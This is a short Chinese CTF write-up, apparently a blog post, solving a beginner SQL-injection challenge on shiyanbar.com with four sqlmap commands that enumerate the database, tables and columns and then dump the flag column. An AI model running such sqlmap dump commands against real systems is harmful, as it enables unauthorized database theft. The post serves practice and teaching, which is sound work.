2018-11-14 SQL注入入门题

2018-11-14 本文已影响5人昨天今天下雨天1

题目：这个看起来有点简单! 分值：10

URL：http://www.shiyanbar.com/ctf/33

解题步骤：

sqlmap扫描目标 --current-db 拿目标的库名

sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

-D 库名 --tables 库内表名

sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

-T 表名 --columns 猜列名

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"-D my_db -T thiskey --columns

-C 列名 --dump 字段值

sqlmap -u"http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -Ck0y --dump